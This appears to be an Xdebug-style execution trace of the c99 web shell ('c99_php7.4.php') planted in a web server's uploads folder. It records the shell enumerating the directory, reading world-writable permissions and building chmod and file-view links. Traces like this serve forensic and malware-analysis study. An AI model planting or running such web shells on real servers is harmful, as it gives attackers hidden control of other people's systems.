2	356	0	0.021730	1347696	in_array	0		/var/www/html/uploads/c99_php7.4.php	2031	2	'/var/www/html/uploads/..'	[]
2	356	1	0.021742	1347768
2	356	R			FALSE
2	357	0	0.021755	1347696	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'..'	'c99_php7.4.php'
2	357	1	0.021768	1347768
2	357	R			FALSE
2	358	0	0.021782	1347696	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'..'	'config.php'
2	358	1	0.021795	1347768
2	358	R			FALSE
2	359	0	0.021808	1347696	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2050	1	'..'
2	359	1	0.021820	1347760
2	359	R			'..'
1		A						/var/www/html/uploads/c99_php7.4.php	2050	$uo = '..'
2	360	0	0.021843	1347728	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2051	1	'/var/www/html/uploads'
2	360	1	0.021856	1347816
2	360	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2051	$ud = '%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	361	0	0.021882	1347752	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2052	1	'/var/www/html/uploads/..'
2	361	1	0.021895	1347848
2	361	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F..'
1		A						/var/www/html/uploads/c99_php7.4.php	2052	$uv = '%2Fvar%2Fwww%2Fhtml%2Fuploads%2F..'
1		A						/var/www/html/uploads/c99_php7.4.php	2053	$row = []
2	362	0	0.021934	1348000	realpath	0		/var/www/html/uploads/c99_php7.4.php	2061	1	'/var/www/html/uploads/..'
2	362	1	0.021948	1348072
2	362	R			'/var/www/html'
2	363	0	0.021961	1347984	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2061	1	'/var/www/html'
2	363	1	0.021974	1348064
2	363	R			'%2Fvar%2Fwww%2Fhtml'
1		A						/var/www/html/uploads/c99_php7.4.php	2061	$row[] = '<img src="?act=img&img=ext_lnk" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml&sort=0a">..</a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2062	$row[] = 'LINK'
2	364	0	0.022017	1348352	date	0		/var/www/html/uploads/c99_php7.4.php	2088	2	'd.m.Y H:i:s'	1676260944
2	364	1	0.022073	1350744
2	364	R			'12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2088	$row[] = '12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2089	$row[] = 'root/root'
2	365	0	0.022118	1350768	view_perms_color	1		/var/www/html/uploads/c99_php7.4.php	2090	1	'/var/www/html/uploads/..'
3	366	0	0.022132	1350768	is_readable	0		/var/www/html/uploads/c99_php7.4.php	512	1	'/var/www/html/uploads/..'
3	366	1	0.022149	1350808
3	366	R			TRUE
3	367	0	0.022162	1350768	is_writable	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/..'
3	367	1	0.022177	1350808
3	367	R			TRUE
3	368	0	0.022190	1350768	fileperms	0		/var/www/html/uploads/c99_php7.4.php	514	1	'/var/www/html/uploads/..'
3	368	1	0.022205	1350808
3	368	R			16895
3	369	0	0.022218	1350768	view_perms	1		/var/www/html/uploads/c99_php7.4.php	514	1	16895
3		A						/var/www/html/uploads/c99_php7.4.php	452	$type = 'd'
3		A						/var/www/html/uploads/c99_php7.4.php	460	$owner['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	461	$owner['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	462	$owner['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	463	$group['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	464	$group['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	465	$group['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	466	$world['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	467	$world['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	468	$world['Uygulanamadi!'] = 'x'
4	370	0	0.022340	1351896	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	370	1	0.022357	1351992
4	370	R			'rwx'
4	371	0	0.022371	1351928	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	371	1	0.022387	1352024
4	371	R			'rwx'
4	372	0	0.022401	1351928	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	372	1	0.022417	1352024
4	372	R			'rwx'
3	369	1	0.022430	1350808
3	369	R			'drwxrwxrwx'
2	365	1	0.022444	1350832
2	365	R			'<font color=green>drwxrwxrwx</font>'
1		A						/var/www/html/uploads/c99_php7.4.php	2090	$row[] = '<a href="?act=chmod&f=..&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>'
2	373	0	0.022477	1350928	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	2092	1	'/var/www/html/uploads/..'
2	373	1	0.022491	1351120
2	373	R			'/var/www/html/uploads/..'
1		A						/var/www/html/uploads/c99_php7.4.php	2092	$checkbox = '<input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/uploads/..">'
2	374	0	0.022520	1350944	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2093	1	'/var/www/html/uploads/..'
2	374	1	0.022533	1350984
2	374	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	2093	$row[] = '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/uploads/..">'
1		A						/var/www/html/uploads/c99_php7.4.php	2095	$tab['head'][] = [0 => '<img src="?act=img&img=ext_lnk" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml&sort=0a">..</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=..&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/uploads/..">']
1		A						/var/www/html/uploads/c99_php7.4.php	2099	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	2024	$v = '/var/www/html/uploads/.'
2	375	0	0.022615	1351576	basename	0		/var/www/html/uploads/c99_php7.4.php	2025	1	'/var/www/html/uploads/.'
2	375	1	0.022630	1351640
2	375	R			'.'
1		A						/var/www/html/uploads/c99_php7.4.php	2025	$o = '.'
2	376	0	0.022653	1351608	dirname	0		/var/www/html/uploads/c99_php7.4.php	2026	1	'/var/www/html/uploads/.'
2	376	1	0.022665	1351688
2	376	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2026	$dir = '/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2028	$disppath = '.'
2	377	0	0.022700	1351568	str2mini	1		/var/www/html/uploads/c99_php7.4.php	2029	2	'.'	60
2	377	1	0.022713	1351568
2	377	R			'.'
1		A						/var/www/html/uploads/c99_php7.4.php	2029	$disppath = '.'
2	378	0	0.022740	1351568	in_array	0		/var/www/html/uploads/c99_php7.4.php	2030	2	'/var/www/html/uploads/.'	[]
2	378	1	0.022753	1351640
2	378	R			FALSE
2	379	0	0.022766	1351568	in_array	0		/var/www/html/uploads/c99_php7.4.php	2031	2	'/var/www/html/uploads/.'	[]
2	379	1	0.022778	1351640
2	379	R			FALSE
2	380	0	0.022791	1351568	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'.'	'c99_php7.4.php'
2	380	1	0.022804	1351640
2	380	R			FALSE
2	381	0	0.022817	1351568	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'.'	'config.php'
2	381	1	0.022830	1351640
2	381	R			FALSE
2	382	0	0.022843	1351568	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2050	1	'.'
2	382	1	0.022855	1351632
2	382	R			'.'
1		A						/var/www/html/uploads/c99_php7.4.php	2050	$uo = '.'
2	383	0	0.022877	1351568	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2051	1	'/var/www/html/uploads'
2	383	1	0.022890	1351656
2	383	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2051	$ud = '%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	384	0	0.022916	1351568	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2052	1	'/var/www/html/uploads/.'
2	384	1	0.022929	1351664
2	384	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.'
1		A						/var/www/html/uploads/c99_php7.4.php	2052	$uv = '%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.'
1		A						/var/www/html/uploads/c99_php7.4.php	2053	$row = []
2	385	0	0.022967	1351744	realpath	0		/var/www/html/uploads/c99_php7.4.php	2056	1	'/var/www/html/uploads/.'
2	385	1	0.022980	1351824
2	385	R			'/var/www/html/uploads'
2	386	0	0.022994	1351744	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2056	1	'/var/www/html/uploads'
2	386	1	0.023005	1351832
2	386	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2056	$row[] = '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&sort=0a">.</a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2057	$row[] = 'LINK'
2	387	0	0.023048	1352136	date	0		/var/www/html/uploads/c99_php7.4.php	2088	2	'd.m.Y H:i:s'	1676260944
2	387	1	0.023079	1352464
2	387	R			'12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2088	$row[] = '12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2089	$row[] = 'root/root'
2	388	0	0.023116	1352488	view_perms_color	1		/var/www/html/uploads/c99_php7.4.php	2090	1	'/var/www/html/uploads/.'
3	389	0	0.023129	1352488	is_readable	0		/var/www/html/uploads/c99_php7.4.php	512	1	'/var/www/html/uploads/.'
3	389	1	0.023145	1352528
3	389	R			TRUE
3	390	0	0.023157	1352488	is_writable	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/.'
3	390	1	0.023172	1352528
3	390	R			TRUE
3	391	0	0.023185	1352488	fileperms	0		/var/www/html/uploads/c99_php7.4.php	514	1	'/var/www/html/uploads/.'
3	391	1	0.023199	1352520
3	391	R			16895
3	392	0	0.023212	1352480	view_perms	1		/var/www/html/uploads/c99_php7.4.php	514	1	16895
3		A						/var/www/html/uploads/c99_php7.4.php	452	$type = 'd'
3		A						/var/www/html/uploads/c99_php7.4.php	460	$owner['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	461	$owner['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	462	$owner['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	463	$group['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	464	$group['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	465	$group['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	466	$world['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	467	$world['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	468	$world['Uygulanamadi!'] = 'x'
4	393	0	0.023334	1353608	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	393	1	0.023352	1353704
4	393	R			'rwx'
4	394	0	0.023365	1353640	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	394	1	0.023381	1353736
4	394	R			'rwx'
4	395	0	0.023394	1353640	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	395	1	0.023414	1353736
4	395	R			'rwx'
3	392	1	0.023428	1352520
3	392	R			'drwxrwxrwx'
2	388	1	0.023441	1352544
2	388	R			'<font color=green>drwxrwxrwx</font>'
1		A						/var/www/html/uploads/c99_php7.4.php	2090	$row[] = '<a href="?act=chmod&f=.&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2091	$checkbox = '<input type="checkbox" name="actbox[]" onclick="ls_reverse_all();">'
1		A						/var/www/html/uploads/c99_php7.4.php	2091	$i--
2	396	0	0.023498	1352400	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2093	1	'/var/www/html/uploads/.'
2	396	1	0.023511	1352440
2	396	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	2093	$row[] = '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" onclick="ls_reverse_all();">'
1		A						/var/www/html/uploads/c99_php7.4.php	2095	$tab['head'][] = [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&sort=0a">.</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" onclick="ls_reverse_all();">']
1		A						/var/www/html/uploads/c99_php7.4.php	2099	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	2024	$v = '/var/www/html/uploads/data'
2	397	0	0.023593	1352656	basename	0		/var/www/html/uploads/c99_php7.4.php	2025	1	'/var/www/html/uploads/data'
2	397	1	0.023607	1352720
2	397	R			'data'
1		A						/var/www/html/uploads/c99_php7.4.php	2025	$o = 'data'
2	398	0	0.023631	1352688	dirname	0		/var/www/html/uploads/c99_php7.4.php	2026	1	'/var/www/html/uploads/data'
2	398	1	0.023644	1352776
2	398	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2026	$dir = '/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2028	$disppath = 'data'
2	399	0	0.023680	1352664	str2mini	1		/var/www/html/uploads/c99_php7.4.php	2029	2	'data'	60
2	399	1	0.023693	1352664
2	399	R			'data'
1		A						/var/www/html/uploads/c99_php7.4.php	2029	$disppath = 'data'
2	400	0	0.023715	1352664	in_array	0		/var/www/html/uploads/c99_php7.4.php	2030	2	'/var/www/html/uploads/data'	[]
2	400	1	0.023729	1352736
2	400	R			FALSE
2	401	0	0.023742	1352664	in_array	0		/var/www/html/uploads/c99_php7.4.php	2031	2	'/var/www/html/uploads/data'	[]
2	401	1	0.023755	1352736
2	401	R			FALSE
2	402	0	0.023768	1352664	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'data'	'c99_php7.4.php'
2	402	1	0.023795	1352736
2	402	R			FALSE
2	403	0	0.023809	1352664	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'data'	'config.php'
2	403	1	0.023863	1352736
2	403	R			FALSE
2	404	0	0.023877	1352664	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2050	1	'data'
2	404	1	0.023890	1352728
2	404	R			'data'
1		A						/var/www/html/uploads/c99_php7.4.php	2050	$uo = 'data'
2	405	0	0.023914	1352664	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2051	1	'/var/www/html/uploads'
2	405	1	0.023926	1352752
2	405	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2051	$ud = '%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	406	0	0.023953	1352664	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2052	1	'/var/www/html/uploads/data'
2	406	1	0.023966	1352760
2	406	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata'
1		A						/var/www/html/uploads/c99_php7.4.php	2052	$uv = '%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata'
1		A						/var/www/html/uploads/c99_php7.4.php	2053	$row = []
2	407	0	0.024003	1352664	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2064	1	'/var/www/html/uploads/data'
2	407	1	0.024019	1352712
2	407	R			TRUE
2	408	0	0.024032	1352672	is_link	0		/var/www/html/uploads/c99_php7.4.php	2066	1	'/var/www/html/uploads/data'
2	408	1	0.024046	1352712
2	408	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	2074	$type = 'DIR'
1		A						/var/www/html/uploads/c99_php7.4.php	2075	$row[] = '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata&sort=0a">[data]</a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2077	$row[] = 'DIR'
2	409	0	0.024099	1353240	date	0		/var/www/html/uploads/c99_php7.4.php	2088	2	'd.m.Y H:i:s'	1676260944
2	409	1	0.024135	1353568
2	409	R			'12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2088	$row[] = '12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2089	$row[] = 'root/root'
2	410	0	0.024172	1353592	view_perms_color	1		/var/www/html/uploads/c99_php7.4.php	2090	1	'/var/www/html/uploads/data'
3	411	0	0.024185	1353592	is_readable	0		/var/www/html/uploads/c99_php7.4.php	512	1	'/var/www/html/uploads/data'
3	411	1	0.024201	1353632
3	411	R			TRUE
3	412	0	0.024214	1353592	is_writable	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/data'
3	412	1	0.024250	1353632
3	412	R			TRUE
3	413	0	0.024265	1353592	fileperms	0		/var/www/html/uploads/c99_php7.4.php	514	1	'/var/www/html/uploads/data'
3	413	1	0.024278	1353632
3	413	R			16895
3	414	0	0.025405	1353592	view_perms	1		/var/www/html/uploads/c99_php7.4.php	514	1	16895
3		A						/var/www/html/uploads/c99_php7.4.php	452	$type = 'd'
3		A						/var/www/html/uploads/c99_php7.4.php	460	$owner['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	461	$owner['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	462	$owner['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	463	$group['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	464	$group['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	465	$group['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	466	$world['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	467	$world['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	468	$world['Uygulanamadi!'] = 'x'
4	415	0	0.025542	1354720	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	415	1	0.025561	1354816
4	415	R			'rwx'
4	416	0	0.025575	1354752	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	416	1	0.025592	1354848
4	416	R			'rwx'
4	417	0	0.025606	1354752	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	417	1	0.025622	1354848
4	417	R			'rwx'
3	414	1	0.025635	1353632
3	414	R			'drwxrwxrwx'
2	410	1	0.025649	1353656
2	410	R			'<font color=green>drwxrwxrwx</font>'
1		A						/var/www/html/uploads/c99_php7.4.php	2090	$row[] = '<a href="?act=chmod&f=data&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>'
2	418	0	0.025684	1353752	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	2092	1	'/var/www/html/uploads/data'
2	418	1	0.025699	1353944
2	418	R			'/var/www/html/uploads/data'
1		A						/var/www/html/uploads/c99_php7.4.php	2092	$checkbox = '<input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/uploads/data">'
2	419	0	0.025729	1353768	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2093	1	'/var/www/html/uploads/data'
2	419	1	0.025743	1353808
2	419	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	2093	$row[] = '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/uploads/data">'
2	420	0	0.025778	1354024	is_link	0		/var/www/html/uploads/c99_php7.4.php	2096	1	'/var/www/html/uploads/data'
2	420	1	0.025791	1354064
2	420	R			FALSE
2	421	0	0.025805	1354024	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2097	1	'/var/www/html/uploads/data'
2	421	1	0.025818	1354064
2	421	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	2097	$tab['folders'][] = [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata&sort=0a">[data]</a>', 1 => 'DIR', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=data&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/uploads/data">']
1		A						/var/www/html/uploads/c99_php7.4.php	2099	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	2024	$v = '/var/www/html/uploads/.htaccess'
2	422	0	0.025883	1354400	basename	0		/var/www/html/uploads/c99_php7.4.php	2025	1	'/var/www/html/uploads/.htaccess'
2	422	1	0.025898	1354472
2	422	R			'.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2025	$o = '.htaccess'
2	423	0	0.025922	1354440	dirname	0		/var/www/html/uploads/c99_php7.4.php	2026	1	'/var/www/html/uploads/.htaccess'
2	423	1	0.025943	1354528
2	423	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2026	$dir = '/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2028	$disppath = '.htaccess'
2	424	0	0.025980	1354408	str2mini	1		/var/www/html/uploads/c99_php7.4.php	2029	2	'.htaccess'	60
2	424	1	0.025994	1354408
2	424	R			'.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2029	$disppath = '.htaccess'
2	425	0	0.026018	1354408	in_array	0		/var/www/html/uploads/c99_php7.4.php	2030	2	'/var/www/html/uploads/.htaccess'	[]
2	425	1	0.026033	1354480
2	425	R			FALSE
2	426	0	0.026045	1354408	in_array	0		/var/www/html/uploads/c99_php7.4.php	2031	2	'/var/www/html/uploads/.htaccess'	[]
2	426	1	0.026058	1354480
2	426	R			FALSE
2	427	0	0.026071	1354408	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'.htaccess'	'c99_php7.4.php'
2	427	1	0.026085	1354480
2	427	R			FALSE
2	428	0	0.026098	1354408	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'.htaccess'	'config.php'
2	428	1	0.026111	1354480
2	428	R			FALSE
2	429	0	0.026123	1354408	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2050	1	'.htaccess'
2	429	1	0.026136	1354480
2	429	R			'.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2050	$uo = '.htaccess'
2	430	0	0.026160	1354416	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2051	1	'/var/www/html/uploads'
2	430	1	0.026173	1354504
2	430	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2051	$ud = '%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	431	0	0.026199	1354416	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2052	1	'/var/www/html/uploads/.htaccess'
2	431	1	0.026213	1354528
2	431	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2052	$uv = '%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2053	$row = []
2	432	0	0.026251	1354432	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2064	1	'/var/www/html/uploads/.htaccess'
2	432	1	0.026269	1354472
2	432	R			FALSE
2	433	0	0.026283	1354432	is_file	0		/var/www/html/uploads/c99_php7.4.php	2079	1	'/var/www/html/uploads/.htaccess'
2	433	1	0.026296	1354472
2	433	R			TRUE
2	434	0	0.026308	1354432	explode	0		/var/www/html/uploads/c99_php7.4.php	2081	2	'.'	'.htaccess'
2	434	1	0.026322	1354920
2	434	R			[0 => '', 1 => 'htaccess']
1		A						/var/www/html/uploads/c99_php7.4.php	2081	$ext = [0 => '', 1 => 'htaccess']
1		A						/var/www/html/uploads/c99_php7.4.php	2082	$c = 1
1		A						/var/www/html/uploads/c99_php7.4.php	2083	$ext = 'htaccess'
2	435	0	0.026371	1354472	strtolower	0		/var/www/html/uploads/c99_php7.4.php	2084	1	'htaccess'
2	435	1	0.026383	1354504
2	435	R			'htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2084	$ext = 'htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2085	$row[] = '<img src="?act=img&img=ext_htaccess" border="0">&nbsp;<a href="?act=f&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">.htaccess</a>'
2	436	0	0.026425	1355008	view_size	1		/var/www/html/uploads/c99_php7.4.php	2086	1	64
3	437	0	0.026438	1355008	is_numeric	0		/var/www/html/uploads/c99_php7.4.php	304	1	64
3	437	1	0.026450	1355040
3	437	R			TRUE
2		A						/var/www/html/uploads/c99_php7.4.php	310	$size = '64 B'
2	436	1	0.026475	1355040
2	436	R			'64 B'
1		A						/var/www/html/uploads/c99_php7.4.php	2086	$row[] = '64 B'
2	438	0	0.026498	1355040	date	0		/var/www/html/uploads/c99_php7.4.php	2088	2	'd.m.Y H:i:s'	1676260944
2	438	1	0.026531	1355368
2	438	R			'12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2088	$row[] = '12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2089	$row[] = 'root/root'
2	439	0	0.026567	1355392	view_perms_color	1		/var/www/html/uploads/c99_php7.4.php	2090	1	'/var/www/html/uploads/.htaccess'
3	440	0	0.026581	1355392	is_readable	0		/var/www/html/uploads/c99_php7.4.php	512	1	'/var/www/html/uploads/.htaccess'
3	440	1	0.026598	1355432
3	440	R			TRUE
3	441	0	0.026611	1355392	is_writable	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/.htaccess'
3	441	1	0.026627	1355432
3	441	R			FALSE
3	442	0	0.026643	1355392	fileperms	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/.htaccess'
3	442	1	0.026657	1355432
3	442	R			33188
3	443	0	0.026670	1355392	view_perms	1		/var/www/html/uploads/c99_php7.4.php	513	1	33188
3		A						/var/www/html/uploads/c99_php7.4.php	454	$type = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	460	$owner['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	461	$owner['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	462	$owner['Uygulanamadi!'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	463	$group['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	464	$group['write'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	465	$group['Uygulanamadi!'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	466	$world['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	467	$world['write'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	468	$world['Uygulanamadi!'] = '-'
4	444	0	0.026792	1356520	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => '-']
4	444	1	0.026810	1356616
4	444	R			'rw-'
4	445	0	0.026822	1356552	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => '-', 'Uygulanamadi!' => '-']
4	445	1	0.026839	1356648
